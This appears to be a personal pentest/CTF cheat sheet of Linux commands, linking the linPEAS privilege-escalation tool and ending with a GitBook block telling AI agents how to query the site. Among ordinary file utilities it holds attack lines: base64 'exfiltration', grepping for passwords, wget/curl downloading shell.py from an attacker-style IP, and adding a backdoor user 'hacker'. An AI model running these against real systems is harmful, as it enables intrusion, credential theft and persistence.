# Linux

{% tabs %}
{% tab title="PE Tool" %}
{% embed url="<https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS>" %}

{% endtab %}

{% tab title="Commands" %}

```
#Exfiltration using Base64
base64 -w 0 file

#find a file 
find -maxdepth 1 
find ./ -type f  
find ./ -type d 
find ./ -name abc* 
grep -lR password *.txt 
find ./ -name webmin 2>/dev/null 

#query file grep functions
cut –d ":" -f 1 /etc/passwd 
echo "hello::there::firend" | awk –F "::" '{print $1, $3}' 
cat access.log | cut –d " " -f 1 | sort | uniq –c |sort –urn 

#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'

#Count
wc -l <file> #Lines
wc -c #Chars

#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates


#Compare File 
comm fileA.txt fileB.txt 

#Download 
wget 10.10.14.14:8000/shell.py 
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py
-k =>  tag in the end to disable ssl checks done by curl

#Unzipp
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz

#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker  


#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80

##Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content

#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob


```

{% endtab %}
{% endtabs %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://calvin-lai.gitbook.io/calvin-lai-security/useful-command/linux.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.